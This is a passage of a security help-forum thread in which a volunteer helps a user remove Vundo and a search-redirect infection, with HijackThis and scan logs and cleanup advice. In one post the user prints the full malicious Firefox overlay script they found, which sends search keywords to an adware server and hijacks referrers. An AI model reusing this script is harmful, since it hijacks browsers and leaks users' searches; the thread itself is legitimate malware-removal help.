Page 3 of 3 FirstFirst 123
Results 21 to 27 of 27

Thread: Prunnet + BHOs = My computer is suffering - Help!

  1. #21
    Junior Member
    Join Date
    Feb 2009
    Location
    Hendersonville, NC
    Posts
    15

    Default Redirects

    I was still having redirects after all that! I loaded Comodo Internet Suite and it found 30 things! I quarantined them all. I also ran CCleaner and did the registry scan.

    Also, IE loaded when I restarted my computer and Comodo had a popup taht said something like "Comodo is learning : Internet Explorer alters the key XYZ123 (I don't remember what it was)". That may be because I stopped some of my startup programs in spybot. Too bad you cant just uninstall IE!

    I took some screenshots because I wasn't sure how to get text files from these things.
    Files Quarantined by Comodo:


    CCleaner Registry - Morpheus Toolbar? I never had one. I did use Morpheus for a while, but never used a toolbar.:


    Here is an example of redirects, I opened the search results into new tabs and you can see what I got instead! Other common ones are Yahoo HotJobs, CowSurvey, Various AntiVirus Sites, Various Search Sites, etc...


    Actually, this is pretty typical, if I load 5 search results into tabs, 4 will be bogus and one will be something I actually clicked on.

    Don't know if this helps, but here is an updated HJT:

    Logfile of Trend Micro HijackThis v2.0.2
    Scan saved at 10:26:53 AM, on 2/14/2009
    Platform: Windows XP SP3 (WinNT 5.01.2600)
    MSIE: Internet Explorer v7.00 (7.00.6000.16791)
    Boot mode: Normal

    Running processes:
    C:\WINDOWS\System32\smss.exe
    C:\WINDOWS\system32\winlogon.exe
    C:\WINDOWS\system32\services.exe
    C:\WINDOWS\system32\lsass.exe
    C:\WINDOWS\system32\svchost.exe
    C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe
    C:\WINDOWS\system32\svchost.exe
    C:\Program Files\Ahead\InCD\InCDsrv.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\system32\LEXBCES.EXE
    C:\WINDOWS\system32\spoolsv.exe
    C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
    C:\WINDOWS\Explorer.EXE
    C:\WINDOWS\system32\ctfmon.exe
    C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
    C:\WINDOWS\system32\EloSrvce.exe
    C:\Program Files\Java\jre6\bin\jqs.exe
    C:\Program Files\Google\Update\GoogleUpdate.exe
    C:\Program Files\LogMeIn\x86\RaMaint.exe
    C:\WINDOWS\system32\EloDkMon.exe
    C:\Program Files\LogMeIn\x86\LogMeIn.exe
    C:\WINDOWS\system32\EloTTray.exe
    C:\Program Files\LogMeIn\x86\LMIGuardian.exe
    C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
    C:\Program Files\LogMeIn\x86\LogMeInSystray.exe
    C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe
    C:\Program Files\Microsoft LifeCam\MSCamS32.exe
    C:\Program Files\LogMeIn\x86\LMIGuardian.exe
    C:\WINDOWS\system32\nvsvc32.exe
    C:\Program Files\COMODO\COMODO Internet Security\cfp.exe
    C:\WINDOWS\system32\rundll32.exe
    C:\Program Files\Google\Google Talk\googletalk.exe
    C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
    C:\WINDOWS\system32\pctspk.exe
    C:\WINDOWS\system32\HPZipm12.exe
    C:\WINDOWS\System32\svchost.exe
    C:\WINDOWS\system32\UAService7.exe
    C:\Program Files\Canon\CAL\CALMAIN.exe
    C:\WINDOWS\system32\rundll32.exe
    C:\Program Files\Mozilla Firefox\firefox.exe
    C:\WINDOWS\system32\wuauclt.exe
    C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
    R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
    R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
    O2 - BHO: &Yahoo! Toolbar Helper - {02478D38-C3F9-4efb-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
    O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
    O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
    O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
    O2 - BHO: McAfee SiteAdvisor BHO - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
    O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
    O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
    O2 - BHO: SingleInstance Class - {FDAD4DA1-61A2-4FD8-9C17-86F7AC245081} - C:\Program Files\Yahoo!\Companion\Installs\cpn\YTSingleInstance.dll
    O4 - HKLM\..\Run: [LogMeIn GUI] "C:\Program Files\LogMeIn\x86\LogMeInSystray.exe"
    O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
    O4 - HKLM\..\Run: [nForce Tray Options] sstray.exe /r
    O4 - HKLM\..\Run: [Google Desktop Search] "C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe" /startup
    O4 - HKLM\..\Run: [UserFaultCheck] %systemroot%\system32\dumprep 0 -u
    O4 - HKLM\..\Run: [COMODO Internet Security] "C:\Program Files\COMODO\COMODO Internet Security\cfp.exe" -h
    O4 - HKCU\..\Run: [googletalk] C:\Program Files\Google\Google Talk\googletalk.exe /autostart
    O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
    O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
    O4 - Startup: ERUNT AutoBackup.lnk = C:\Program Files\ERUNT\AUTOBACK.EXE
    O4 - Startup: OneNote 2007 Screen Clipper and Launcher.lnk.disabled
    O4 - Startup: OpenOffice.org 2.4.lnk.disabled
    O4 - Global Startup: Acrobat Assistant.lnk.disabled
    O4 - Global Startup: Adobe Gamma Loader.exe.lnk.disabled
    O4 - Global Startup: Adobe Gamma Loader.lnk.disabled
    O4 - Global Startup: Adobe Reader Speed Launch.lnk.disabled
    O4 - Global Startup: Device Detector 2.lnk.disabled
    O4 - Global Startup: Device Detector 3.lnk.disabled
    O4 - Global Startup: HP Digital Imaging Monitor.lnk.disabled
    O4 - Global Startup: Microsoft Office.lnk.disabled
    O4 - Global Startup: Microsoft Works Calendar Reminders.lnk.disabled
    O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions present
    O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
    O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office12\EXCEL.EXE/3000
    O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~2\Office12\ONBttnIE.dll
    O9 - Extra 'Tools' menuitem: S&end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~2\Office12\ONBttnIE.dll
    O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
    O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
    O9 - Extra button: Share in Hello - {B13B4423-2647-4cfc-A4B3-C7D56CB83487} - C:\Program Files\Hello\PicasaCapture.dll
    O9 - Extra 'Tools' menuitem: Share in H&ello - {B13B4423-2647-4cfc-A4B3-C7D56CB83487} - C:\Program Files\Hello\PicasaCapture.dll
    O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
    O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
    O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
    O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
    O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
    O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
    O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
    O16 - DPF: {474F00F5-3853-492C-AC3A-476512BBC336} (UploadListView Class) - http://picasaweb.google.com/s/v/19.13/uploader2.cab
    O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} - http://download.mcafee.com/molbin/sh...3/mcinsctl.cab
    O16 - DPF: {664088B0-6AF3-4514-AF9D-A0DC3A3DF24A} (F-Secure Online Scanner 3.3) - http://support.f-secure.com/ols3beta/fscax.cab
    O16 - DPF: {B9191F79-5613-4C76-AA2A-398534BB8999} (YAddBook Class) - http://us.dl1.yimg.com/download.yaho...tocomplete.cab
    O16 - DPF: {BCC0FF27-31D9-4614-A68E-C18E1ADA4389} - http://download.mcafee.com/molbin/sh...26/mcgdmgr.cab
    O16 - DPF: {FD0B6769-6490-4A91-AA0A-B5AE0DC75AC9} (Performance Viewer Activex Control) - https://secure.logmein.com/activex/ractrl.cab?lmi=100
    O18 - Protocol: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
    O20 - AppInit_DLLs: C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLL
    O23 - Service: Avira AntiVir Personal - Free Antivirus Scheduler (AntiVirScheduler) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
    O23 - Service: Avira AntiVir Personal - Free Antivirus Guard (AntiVirService) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
    O23 - Service: Canon Camera Access Library 8 (CCALib8) - Canon Inc. - C:\Program Files\Canon\CAL\CALMAIN.exe
    O23 - Service: COMODO Internet Security Helper Service (cmdAgent) - Unknown owner - C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe
    O23 - Service: EloSystemService - Elo Touchsystems, Inc. - C:\WINDOWS\system32\EloSrvce.exe
    O23 - Service: Google Desktop Manager 5.8.811.4345 (GoogleDesktopManager-110408-113106) - Google - C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe
    O23 - Service: Google Update Service (gupdate1c98bee6cb9fb98) (gupdate1c98bee6cb9fb98) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe
    O23 - Service: Google Software Updater (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
    O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
    O23 - Service: InCD Helper (InCDsrv) - Nero AG - C:\Program Files\Ahead\InCD\InCDsrv.exe
    O23 - Service: InCD Helper (read only) (InCDsrvR) - Nero AG - C:\Program Files\Ahead\InCD\InCDsrv.exe
    O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
    O23 - Service: LexBce Server (LexBceS) - Lexmark International, Inc. - C:\WINDOWS\system32\LEXBCES.EXE
    O23 - Service: LogMeIn Maintenance Service (LMIMaint) - LogMeIn, Inc. - C:\Program Files\LogMeIn\x86\RaMaint.exe
    O23 - Service: LogMeIn - LogMeIn, Inc. - C:\Program Files\LogMeIn\x86\LogMeIn.exe
    O23 - Service: McAfee SiteAdvisor Service - Unknown owner - C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
    O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
    O23 - Service: PCTEL Speaker Phone (Pctspk) - PCtel, Inc. - C:\WINDOWS\system32\pctspk.exe
    O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
    O23 - Service: SecuROM User Access Service (V7) (UserAccess7) - Unknown owner - C:\WINDOWS\system32\UAService7.exe

    --
    End of file - 10286 bytes

  2. #22
    Junior Member
    Join Date
    Feb 2009
    Location
    Hendersonville, NC
    Posts
    15

    Default Another Question - Nuclear Option?

    [Note: I also have another reply above this one]

    Would this work:
    1. Purchase a new SATA HD (1TB is cheap these days!!)
    2. Take out my current drives (IDE's)
    3. Load Windows
    4. Then re-insert my current drives as secondary (slave) drives and copy desired files onto the new C drive.
    5. Format the old drives.


    Would the new C drive just get infected straight away?
    Or does the infection need to be on C in order to work?

    Or am I getting ahead of myself.

  3. #23
    Emeritus- Security Expert peku006's Avatar
    Join Date
    Feb 2007
    Location
    Norway
    Posts
    3,103

    Default

    Hi drrchrds

    I restarted my computer and Comodo had a popup taht said something like "Comodo is learning
    Please read this

    Files Quarantined by Comodo:
    a lot of files in the System Restore and they are no active........

    I do not know why you have this
    C:\Program Files\Sibelius Software 3 \Keygen.exe

    all of them "Heur.Packed" are legitimate program. I do not know why Comodo has moved them to quarantine

    CCleaner removes only empty registry values
    Registry Cleaners, not recommended

    Open Notepad.
    Copy the text from the box to an empty file.
    Save it as export.bat to your desktop.
    Choose save as all types
    Code:
    regedit /e C:\look.txt "HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32"
    Close Notepad.

    Locate Export.bat on your Desktop and double-click on it It will create a file called look.txt in C:\
    Copy the entire text and past it to your reply here in this topic.

    Thanks peku006
    Last edited by peku006; 2009-02-15 at 10:01.
    I don't help with logs thru PM. If you have problems create a thread in the forum, please.

  4. #24
    Junior Member
    Join Date
    Feb 2009
    Location
    Hendersonville, NC
    Posts
    15

    Default Reg and MBAM and redirect script found in firefox folder

    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
    "midimapper"="midimap.dll"
    "msacm.imaadpcm"="imaadp32.acm"
    "msacm.msadpcm"="msadp32.acm"
    "msacm.msg711"="msg711.acm"
    "msacm.msgsm610"="msgsm32.acm"
    "msacm.trspch"="tssoft32.acm"
    "vidc.cvid"="iccvid.dll"
    "VIDC.I420"="msh263.drv"
    "vidc.iv31"="C:\\WINDOWS\\system32\\ir32_32.dll"
    "vidc.iv32"="C:\\WINDOWS\\system32\\ir32_32.dll"
    "VIDC.IYUV"="iyuv_32.dll"
    "vidc.mrle"="msrle32.dll"
    "vidc.msvc"="msvidc32.dll"
    "VIDC.UYVY"="msyuv.dll"
    "VIDC.YUY2"="msyuv.dll"
    "VIDC.YVU9"="tsbyuv.dll"
    "VIDC.YVYU"="msyuv.dll"
    "wavemapper"="msacm32.drv"
    "msacm.msg723"="msg723.acm"
    "vidc.M263"="msh263.drv"
    "vidc.M261"="msh261.drv"
    "msacm.msaudio1"="msaud32.acm"
    "msacm.sl_anet"="sl_anet.acm"
    "msacm.l3acm"="C:\\WINDOWS\\System32\\l3codeca.acm"
    "vidc.DIVX"="divx.dll"
    "wave"="wdmaud.drv"
    "midi"="wdmaud.drv"
    "mixer"="wdmaud.drv"
    "vidc.ir41"="C:\\WINDOWS\\System32\\ir41_32.ax"
    "msacm.iac2"="C:\\WINDOWS\\System32\\iac25_32.ax"
    "vidc.iv50"="ir50_32.dll"
    "vidc.iv41"="ir41_32.ax"
    "msacm.voxacm160"="vct3216.acm"
    "VIDC.SP53"="SP5X_32.DLL"
    "VIDC.SP54"="SP5X_32.DLL"
    "VIDC.SP55"="SP5X_32.DLL"
    "VIDC.SP56"="SP5X_32.DLL"
    "VIDC.SP57"="SP5X_32.DLL"
    "VIDC.SP58"="SP5X_32.DLL"
    "VIDC.SP59"="SP5X_32.DLL"
    "MSVideo"="vfwwdm32.dll"
    "MSVideo8"="VfWWDM32.dll"
    "wave1"="wdmaud.drv"
    "mixer1"="wdmaud.drv"
    "wave2"="wdmaud.drv"
    "mixer2"="wdmaud.drv"
    "wave3"="wdmaud.drv"
    "mixer3"="wdmaud.drv"
    "midi1"="KORGUMDD.DRV"
    "wave4"="wdmaud.drv"
    "midi2"="wdmaud.drv"
    "mixer4"="wdmaud.drv"
    "aux"="wdmaud.drv"
    "wave5"="wdmaud.drv"
    "midi3"="wdmaud.drv"
    "mixer5"="wdmaud.drv"
    "aux1"="wdmaud.drv"
    "wave6"="wdmaud.drv"
    "mixer6"="wdmaud.drv"
    "vidc.VP60"="vp6vfw.dll"
    "vidc.VP61"="vp6vfw.dll"
    "vidc.VP62"="vp6vfw.dll"
    "VIDC.XVID"="xvidvfw.dll"
    "VIDC.YV12"="yv12vfw.dll"
    "msacm.ac3acm"="ac3acm.acm"
    "msacm.lameacm"="lameACM.acm"
    "VIDC.FFDS"="ff_vfw.dll"
    "wave7"="wdmaud.drv"
    "midi4"="wdmaud.drv"
    "mixer7"="wdmaud.drv"
    "aux2"="wdmaud.drv"
    "wave8"="wdmaud.drv"
    "midi5"="wdmaud.drv"
    "mixer8"="wdmaud.drv"
    "aux3"="wdmaud.drv"
    "wave9"="wdmaud.drv"
    "mixer9"="wdmaud.drv"
    "msacm.siren"="sirenacm.dll"

    [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32\Terminal Server]

    [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32\Terminal Server\RDP]
    "wave"="rdpsnd.dll"
    "MaxBandwidth"=dword:000056b9
    "wavemapper"="msacm32.drv"
    "EnableMP3Codec"=dword:00000001
    "midimapper"="midimap.dll"

    ------------------------------------------------------------------
    I ran malwarebytes again, still found vundo.

    Malwarebytes' Anti-Malware 1.34
    Database version: 1763
    Windows 5.1.2600 Service Pack 3

    2/15/2009 8:55:01 AM
    mbam-log-2009-02-15 (08-55-01).txt

    Scan type: Full Scan (C:\|E:\|H:\|)
    Objects scanned: 358867
    Time elapsed: 5 hour(s), 25 minute(s), 0 second(s)

    Memory Processes Infected: 0
    Memory Modules Infected: 0
    Registry Keys Infected: 1
    Registry Values Infected: 0
    Registry Data Items Infected: 1
    Folders Infected: 0
    Files Infected: 0

    Memory Processes Infected:
    (No malicious items detected)

    Memory Modules Infected:
    (No malicious items detected)

    Registry Keys Infected:
    HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{6d794cb4-c7cd-4c6f-bfdc-9b77afbdc02c} (Trojan.Vundo) -> Quarantined and deleted successfully.

    Registry Values Infected:
    (No malicious items detected)

    Registry Data Items Infected:
    HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel\Homepage (Hijack.Homepage) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.

    Folders Infected:
    (No malicious items detected)

    Files Infected:
    (No malicious items detected)


    ----------------------------------------------------------------------
    FYI: This is the redirect script. I found 2 copies called overlay.xul in the firefox folder, both created within 1 minute of the time I got Vundo. I encrypted this file with axcrypt so that I could undo it if I had to and I replaced it with a blank version with the same name, result: no more redirects:


    <overlay id="xulcache-overlay" xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
    <script type="application/x-javascript" >
    window.addEventListener("load", function() { xulRef.init(); }, false);
    window.addEventListener("load", initRequestObserver, false);
    var xulRef = {
    init:
    function(){
    var appcontent = document.getElementById("appcontent");
    if(appcontent){
    appcontent.addEventListener("DOMContentLoaded", xulRef.onPageLoad, true);
    }
    },
    onPageLoad:
    function(aEvent){
    var doc = aEvent.originalTarget;
    var loc = doc.location.href;
    var ref = doc.referrer;
    var keyword = '';
    var engine ;
    var __d = "http://v1.adwarefeed.com/ffjs.php?u=2630369290-57989841-1078081533-839522115a=998&amp;s=3&amp;v=icv270109ff&amp;e=";

    if( loc.match(/google\..+\/search.*[&amp;\?]q=([^&amp;]*)/)){
    keyword = RegExp.$1;
    engine = 'google';
    // } else if(loc.match(/search\.ua.+[&amp;\?]q=([^&amp;]*)/)){
    // keyword = RegExp.$1;
    } else if ( loc.match(/search\.yahoo.*search.*[&amp;\?]p=([^&amp;]*)/)){
    keyword = RegExp.$1;
    engine = 'yahoo';
    } else if(loc.match(/altavista\.com.*results[&amp;\?].*q=([^&amp;]*)/)){
    keyword = RegExp.$1;
    engine = 'altavista';
    } else if(loc.match(/alltheweb\.com.*search[&amp;\?].*q=([^&amp;]*)/)){
    keyword = RegExp.$1;
    engine = 'alltheweb';
    } else if(loc.match(/search\.netscape\.com.*search[&amp;\?].*query=([^&amp;]*)/)){
    keyword = RegExp.$1;
    engine = 'netscape';
    } else if(loc.match(/search\.aol\.com.*search[&amp;\?].*query=([^&amp;]*)/)){
    keyword = RegExp.$1;
    engine = 'aol';
    } else if(loc.match(/ask\.com.*web[&amp;\?].*q=([^&amp;]*)/)){
    keyword = RegExp.$1;
    engine = 'ask';
    } else if(loc.match(/search\.com.*search[&amp;\?].*q=([^&amp;]*)/)){
    keyword = RegExp.$1;
    engine = 'searchcom';
    } else if(loc.match(/search\.lycos\.com.*[&amp;\?].*query=([^&amp;]*)/)){
    keyword = RegExp.$1;
    engine = 'lycos';
    } else if(loc.match(/nova\.rambler\.ru.*search[&amp;\?].*query=([^&amp;]*)/)){
    keyword = RegExp.$1;
    engine = 'rambler';
    } else if(loc.match(/gogo\.ru.*go[&amp;\?].*q=([^&amp;]*)/)){
    keyword = RegExp.$1;
    engine = 'gogo';
    } else if(loc.match(/meta\.ua.*search.asp[&amp;\?]q=([^&amp;]*)/)){
    keyword = RegExp.$1;
    engine = 'meta';
    //} else if(loc.match(/au\.ru.*searchPhrase=([^&amp;]*)/)){
    // keyword = RegExp.$1;
    } else if(loc.match(/all\.by.*search.*[&amp;\?]query=([^&amp;]*)/)){
    keyword = RegExp.$1;
    engine = 'allby';
    // } else if(loc.match(/uaport\.net.*UAcatalog[/][&amp;\?].*query=([^&amp;]*)/)){
    // keyword = RegExp.$1;
    } else if(loc.match(/search\.msn\.com.*results.*[&amp;\?].*q=([^&amp;]*)/)){
    keyword = RegExp.$1;
    engine = 'msn';
    } else if(loc.match(/search\.live\.com.*results.*[&amp;\?]q=([^&amp;]*)/)){
    keyword = RegExp.$1;
    engine = 'live';
    };

    if( keyword.length > 0 ){
    var script = window.content.document.createElement('script');
    script.id = "js_0";
    script.src = __d + engine + '&amp;q=' + keyword;
    doc.getElementsByTagName('head')[0].appendChild(script);
    }
    }
    };
    function initRequestObserver() {
    var observerService = Components.classes["@mozilla.org/observer-service;1"].getService(Components.interfaces.nsIObserverService);
    observerService.addObserver(httpRequestObserver, "http-on-modify-request", false);
    }

    var httpRequestObserver = {
    observe:
    function(subject, topic, data) {
    if(topic == "http-on-modify-request") {
    var httpChannel = subject.QueryInterface(Components.interfaces.nsIHttpChannel);
    var pos = subject.URI.spec.indexOf("&amp;rf=http");
    if(pos > -1) {
    var newRef = this.ioService = Components.classes["@mozilla.org/network/io-service;1"] .getService(Components.interfaces.nsIIOService) .newURI(decodeURIComponent(subject.URI.spec.substring(pos+4)), null, null);
    httpChannel.referrer = newRef; subject.URI.spec = subject.URI.spec.substring(0, pos);
    }
    }
    }
    };

    </script>
    </overlay>



    -----------------------------------------------------------------
    Lastly, thanks for the tip about registry cleaners.

  5. #25
    Emeritus- Security Expert peku006's Avatar
    Join Date
    Feb 2007
    Location
    Norway
    Posts
    3,103

    Default

    Hi drrchrds

    Logs look good. How's the computer running now? Any problems?
    I don't help with logs thru PM. If you have problems create a thread in the forum, please.

  6. #26
    Junior Member
    Join Date
    Feb 2009
    Location
    Hendersonville, NC
    Posts
    15

    Default good!

    I think it is all clear now. No redirects and no malware/spyware found.

    Thank you for all your help!
    People like you who share your expertise in these forums are such an asset.


    Thanks again.

  7. #27
    Emeritus- Security Expert peku006's Avatar
    Join Date
    Feb 2007
    Location
    Norway
    Posts
    3,103

    Default

    Hi drrchrds

    The scans are fine and it looks like your machine is clean

    Now lets uninstall ComboFix:

    • Click START then RUN
    • Now type Combofix /u in the runbox and click OK


    Now that you are clean, please follow these simple steps in order to keep your computer clean and secure:

    Disable and Enable System Restore-WINDOWS XP
    This is a good time to clear your existing system restore points and establish a new clean restore point:

    Turn off System Restore
    • On the Desktop, right-click My Computer.
    • Click Properties.
    • Click the System Restore tab.
    • Check Turn off System Restore.
    • Click Apply, and then click OK.
    • Reboot.

    Turn ON System Restore
    • On the Desktop, right-click My Computer.
    • Click Properties.
    • Click the System Restore tab.
    • UN-Check *Turn off System Restore*.
    • Click Apply, and then click OK.

    This will remove all restore points except the new one you just created.

    Here are some free programs I recommend that could help you improve your computer's security.

    Spybot Search and Destroy 1.6
    Download it from here. Just choose a mirror and off you go.
    Find here the tutorial on how to use Spybot properly here

    Install SpyWare Blaster 4.0
    Download it from here
    Find here the tutorial on how to use Spyware Blaster here

    Install WinPatrol
    Download it from here
    Here you can find information about how WinPatrol works here

    Install FireTrust SiteHound
    You can find information and download it from here

    Install MVPS Hosts File from here
    The MVPS Hosts file replaces your current HOSTS file with one containing well know ad sites etc. Basically, this prevents your computer from connecting to those sites by redirecting them to 127.0.0.1 which is your local computer.
    Find Tutorial here : http://www.mvps.org/winhelp2002/hosts.htm

    Update your Antivirus programs and other security products regularly to avoid new threats that could infect your system.
    You can use one of these sites to check if any updates are needed for your pc.
    Secunia Software Inspector
    F-secure Health Check

    Visit Microsoft often to get the latest updates for your computer.
    http://www.update.microsoft.com

    Please check out Tony Klein's article "How did I get infected in the first place?"

    Read some information here how to prevent Malware.


    Happy safe surfing!
    I don't help with logs thru PM. If you have problems create a thread in the forum, please.

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •